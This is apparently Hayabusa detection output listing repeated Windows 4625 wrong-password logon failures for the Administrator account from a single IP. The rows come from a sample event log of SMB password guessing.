NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.510 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.894 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.371 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.515 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.599 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.581 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.010 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.118 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.438 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.494 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | 